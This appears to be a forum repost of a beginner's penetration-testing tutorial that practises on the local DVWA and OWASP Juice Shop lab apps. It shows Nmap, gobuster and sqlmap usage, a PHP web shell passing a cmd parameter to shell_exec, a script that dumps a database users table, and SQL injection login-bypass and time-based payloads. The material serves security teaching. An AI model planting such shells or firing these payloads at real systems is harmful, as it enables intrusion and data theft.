Pentesting 101: Where to Start

[META]

Penetration testers are not "half-bad hackers," but information security specialists who simulate real cyberattacks to discover weaknesses in systems. They are also called "ethical hackers" or "security testers," but the essence of their work remains the same: they help companies protect themselves from potential threats while operating within the law.

My name is Ilya, and my path to pentesting began after extensive experience in web development. I currently work at Bright Security, where I develop the DAST (Dynamic Application Security Testing) system. This application testing method allows for the detection of vulnerabilities in real time by analyzing application performance through scanning.

In this article, we'll explore how penetration testing works, learn the basics of tools like Nmap, Gobuster, and SQLMap, and even find a couple of vulnerabilities in the DVWA and OWASP Juice Shop applications. This article is useful for those interested in this field and want to practice. There's no promotion of courses—the material is designed for those with a basic understanding and ready to dive into independent research.

Article navigation:

• Penetration testing tasks and basic knowledge requirements
• Network Analysis with Nmap
• Finding hidden directories with gobuster
• Using Known Vulnerable Applications
• Uploading a malicious file to DVWA
• SQL injection on OWASP Juice Shop

Differences between hackers​

Hackers are divided into several categories depending on their goals and methods:

• Black Hat: Acting illegally, causing harm, stealing data, or gaining financial gain.
• White Hat: They operate legally, conduct penetration tests, and identify vulnerabilities to protect systems.
• Grey Hat: Use methods similar to Black Hat, but with the intent to help improve security, although their actions may fall into a legal gray area.

Main tasks of pentesting​

Penetration testers are classified as white hats . Combining the skills of a programmer and a cybersecurity specialist, they perform the following tasks:

1. Vulnerability detection: Identify weaknesses such as outdated components, weak passwords, and misconfigurations of network devices.
2. Security Mechanism Test: Assessing the effectiveness of existing security measures and their ability to resist unauthorized access.
3. Threat simulation: Modeling the behavior of attackers in a controlled environment to test the system's response to potential attacks.
4. Employee training: raising staff awareness of cyber threats and preparing them to respond to incidents.
5. Compliance: Confirming that systems meet government security standards, which is especially important for industries with high data protection requirements.

Where to start if you want to become a penetration tester​

Here's a quick list of basics to get you started:

• IT and Networks: Learn the basics of operating systems (Linux, Windows) and networks (TCP/IP, HTTP, DNS).
• Programming: Learn at least one language (such as Python, Ruby, or Crystal) to automate tasks and build tools.
• Cybersecurity: Understand common vulnerabilities (SQL injection, XSS, CSRF) and the basics of cryptography.
• Tools: Try Nmap, Wireshark, Metasploit, Burp Suite to help you with practical tasks.
• Ethics and the law: Remember that penetration testing is only legal with the permission of the system owners. Ethics are the key to a successful career.
• Practice: Use platforms like Hack The Box, TryHackMe, or VulnHub to practice your knowledge in real-world scenarios.

Additionally, here's a good article with a more detailed description of the necessary steps. Without further ado, we'll get down to business.

Network Analysis with Nmap​

Moving from theory to practice, let's consider one of the first steps of a pentest: network analysis . Let's imagine we only know the server's IP address. To understand what services are running on it and what ports are open, we can use the popular Nmap utility , which offers very broad functionality:

• scanning open ports and identifying services running on them;
• determination of operating systems and software versions;
• identification of network filters and firewalls;
• obtaining additional information about the target system.

I won't go into detail, but I'll demonstrate a few basic examples. Official documentation .

Once Nmap is installed on your computer, you can scan your localhost. After scanning, the utility will display all open ports it found and the services running on them. In my case:

If you add the -sV flag , Nmap will provide much more information, including the versions of applications running on SSH and HTTP ports. Knowing which services (and their versions) are running on the target machine, the penetration tester gets a "map" of potential attack points. If, for example, an old version of Apache or MySQL is detected, they can immediately check for known vulnerabilities and exploits specifically for those versions. This helps them more effectively select hacking tools and techniques, saves time, and makes testing more accurate.

Finding hidden directories with gobuster​

If we have a potential website to attack, we know its homepage address and can check for hidden pages and directories on that domain. To obtain this information, we can use gobuster. It's a good tool for enumerating directories on a website. There are many tools with similar functionality, such as dirb, dirsearch, and others. Gobuster uses dictionaries to analyze directories, and there are many ready-made ones available; for example, I used this one .

Now we see that the service running on localhost:31337 is written in the Wordpress CMS and also has a robots.txt file. For a more detailed analysis, we can find a specialized dictionary for Wordpress and repeat the scan.

Using Known Vulnerable Applications​

For secure pentesting practices, intentionally vulnerable web applications are often used. These are deployed locally to test tools without risking damage to the actual infrastructure. Below are some popular options:

DVWA (Damn Vulnerable Web App)

• A classic educational application with intentionally introduced vulnerabilities (SQL Injection, XSS, CSRF, etc.).
• Allows you to practice different levels of attack difficulty, from low to high.
• GitHub

OWASP Juice Shop

• "Online store" containing all possible vulnerability categories from the OWASP Top 10.
• Built on a modern technology stack (Angular, Node.js).
• GitHub

bWAPP (Buggy Web Application)

• Another web application with many intentional bugs (from basic to advanced).
• It has broad support for attacks, including those against mobile APIs.
• Official website

WebGoat (OWASP Project)

• A set of practical tasks on web security with examples of vulnerabilities.
• It has a gamified format with step-by-step instructions for each vulnerability.
• GitHub

Hackazon (Rapid7)

• A web application that simulates an online store website and contains typical vulnerabilities.
• Deployed locally to conduct various attack scenarios.
• GitHub

VulnHub

• Not a separate application, but a platform with ready-made virtual machines, each of which has a set of vulnerabilities.
• Convenient for conducting full (end-to-end) pentests in a virtual environment.
• Official website

Using the projects listed, you can develop skills in all the main aspects of pentesting: from simple SQL injections to more complex scenarios involving access rights and hidden services. Furthermore, many applications already have a list of vulnerabilities they contain, making it easier to choose which ones to practice with.

Uploading a malicious file to DVWA​

Validating files uploaded to your server is critically important. If an attacker uploads a malicious file to your server, they can easily access sensitive data, execute shell commands, download your website's database, and much more. Let's look at how to do this using DVWA as an example.

Installing DVWA​

If you already have git and docker installed, installing DVWA is easy:

git clone https://github.com/digininja/DVWA.git
cd DVWA
docker compose up -d


After successful installation, go to http://localhost:4280/ and perform the initial configuration of the application.

Initial setup of DVWA​

1. Enter login admin and password password , then click "Login" .
2. On the main page, click "Create / Reset Database" .
3. Please log in again.
4. Go to http://localhost:4280/security.php and set the security level to "Low ." This will make the application easier to hack for our purposes.

Demonstration of vulnerability​

Let's go to the file upload page http://localhost:4280/vulnerabilities/upload/ and upload the PHP file malicious.php, which will execute shell commands passed via the cmd parameter:

<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}


Now, when you navigate to http://localhost:4280/hackable/uploads/malicious.php?cmd=pwd , you'll see the output of the pwd command. This means we've successfully uploaded the file to this directory and found a vulnerability in the system.

Advanced example: exporting a list of users​

But why do we need a simple directory on the server? Let's do something more interesting: for example, get a list of users from the database:

1. Create a PHP file export_users.php with the following contents:

<?php
// Настройка параметров подключения к базе данных
$host = '';
$db = '';
$user = '';
$pass = '';
$charset = 'utf8mb4';

$dsn = "mysql:host=$host;dbname=$db;charset=$charset";
// Подключение к базе данных
$pdo = new PDO($dsn, $user, $pass);

// Запрос для получения всех пользователей
$stmt = $pdo->query("SELECT * FROM users");

// Получение всех данных и вывод на экран
$users = $stmt->fetchAll();
print_r($users);
exit;
?>

1. We upload this file to the site using the same form and go to http://localhost:4280/hackable/uploads/export_users.php to see the result - a complete list of users from the DVWA database.

Yes, for this example we need to know the database connection details, but that's a technical matter. You can dig into the project's configuration files and find these variables yourself, or write your own PHP script that will pull this data from the server.

SQL injection on OWASP Juice Shop​

SQL injection is one of the most critical and widespread vulnerabilities today. If a developer fails to validate and escape user input, but uses it directly in SQL queries, an attacker can inject their own code into the database query. This increases the risk of unauthorized access to data and, in the worst case, leads to complete system compromise. Let's look at the OWASP Juice Shop example.

Let's install Juice Shop​

The documentation provides several installation options, but I'll choose the shortest one - via Docker.

docker pull bkimminich/juice-shop
docker run --rm -p 127.0.0.1:3000:3000 bkimminich/juice-shop


After successful installation, go to http://localhost:3000 , the application should be running there.

Attack on the authorization form​

On the Juice Shop login page, we have a form that is vulnerable to SQL injection. By default, the correct login and password can be found in the Juice Shop repository, but it's more interesting to test a typical SQL injection scenario.

On the Juice Shop login page, we have a form that is vulnerable to SQL injection. By default, the correct login and password can be found in the Juice Shop repository, but it's more interesting to test a typical SQL injection scenario.

Try entering the following in the login field: blablabla OR 1=1 -- , and any value (for example, 1234 ) in the password field . Despite the incorrect data, authorization will be successful. What happened?

1. The logical part of OR 1=1: When the OR 1=1
   condition appears in a database query string , it is always true. Thus, SQL injection "tricks" the validation system by saying, "Return me the user if the login is 'blablabla' or the condition 1=1." Since 1=1 is always true, the selection criterion is not limited to a specific login.
2. In SQL, the -- construct means a comment until the end of the line. Everything after the -- is ignored by the database server, which interrupts further query syntax. Therefore, if the original query included a password check, it simply won't be performed because it's commented out.

As an exercise, you can try other string variations to test how responsive the login form is to SQL injections.

Checking for SQL injection via SqlMap​

I'd also like to briefly discuss another useful tool for SQL injection testing. SQLMap is a popular open-source tool designed to automate the process of detecting and exploiting SQL injection vulnerabilities. It can:

1. Automatically detect vulnerability types (Boolean-based, Error-based, UNION-based, Blind SQL Injection, etc.).
2. Extract database structure (names of databases, tables, columns).
3. Execute commands (if the application's permissions are not configured correctly).
4. Obtain hashed passwords and even (under certain conditions) decrypt them.
5. And much more (for example, brute-force of certain parameters, bypassing WAF/IPS, etc.).

How to use SQLMap​

On most modern Linux distributions, SQLMap can be installed from the following repositories:

sudo apt-get install sqlmap


To avoid specifying all the headers manually each time, let's write the request to the request.txt file:

POST /rest/user/login HTTP/1.1
Host: localhost:3000
Accept: application/json
Content-Type: application/json
{"email":"[email protected]","password":"password"}


Let's run sqlmap to analyze our query:

sqlmap -r request.txt --ignore-code=401,500 --level=2


-r request.txt passes the entire request from the file;

--ignore-code=401,500 allows you to ignore responses with codes 401 and 500, which in our case will lead to errors and sqlmap will not detect SQL injection;

--level=2 enables additional tests (compared to level 1).

As you can see, sqlmap also found SQL injection, but used a different payload: ' AND CASE WHEN 4625=4625 THEN 4625 ELSE JSON(CHAR(114,71,84,66)) END AND 'teul'='teul

And if we increase the level parameter and add the risk parameter , then sqlmap will show us that the same SQL injection can be found using a time-based technique.

That is, in this case, 'OR 3714=LIKE(CHAR(65,66,67,68,69,70,71), UPPER(HEX(RANDOMBLOB(500000000/2))))-- LrCf is added.

Here, SQLMap invokes a long-running RANDOMBLOB(...) operation to track whether the response is delayed. If the response is indeed delayed, this confirms the presence of a time-based blindness vulnerability.

Conclusion​

Penetration testing is a fascinating yet challenging field that requires practical skills and ongoing self-education. In this article, we covered the basics—from port scanning with Nmap to finding SQL injections with SQLMap. Now, to consolidate your knowledge and get started as a beginner, I recommend the following plan:

1. Practice on intentionally vulnerable applications: use frameworks like DVWA, OWASP Juice Shop, bWAPP, and WebGoat. These platforms are designed specifically for safely practicing vulnerability hunting techniques.
2. Mastering basic pentest tools:
   • Nmap: for scanning networks and finding open ports.
   • Gobuster: for enumerating directories and detecting hidden resources.
   • SQLMap: for automated SQL injection detection.
   • Burp Suite: for web traffic analysis and modification.
     Additionally, explore alternatives such as OWASP ZAP, WFuzz, or GoBuster to expand your toolkit.
3. Participate in online training and CTF competitions: Platforms like Hack The Box, TryHackMe, and VulnHub offer real-world attack scenarios where you can test and improve your skills in realistic conditions.
4. Continuous self-education: regularly learn new techniques and vulnerabilities, stay up-to-date with cybersecurity news, and participate in professional communities. This will help you not only solidify your basic knowledge but also keep up with rapidly changing technologies.

If you feel ready for the next step, try your hand at Bug Bounty programs—it's a great way to test your skills on real projects and maybe even earn some money.

 

[kamelli123]

hm

 

[KingGaza1]

hm

 

[MOLODOST]

qwe

 

[Colapola]

ty

 

[leannemw78]

sup

 

[zahifelix3]

++

 

[dazdazdf]

ok

 

[echolion]

++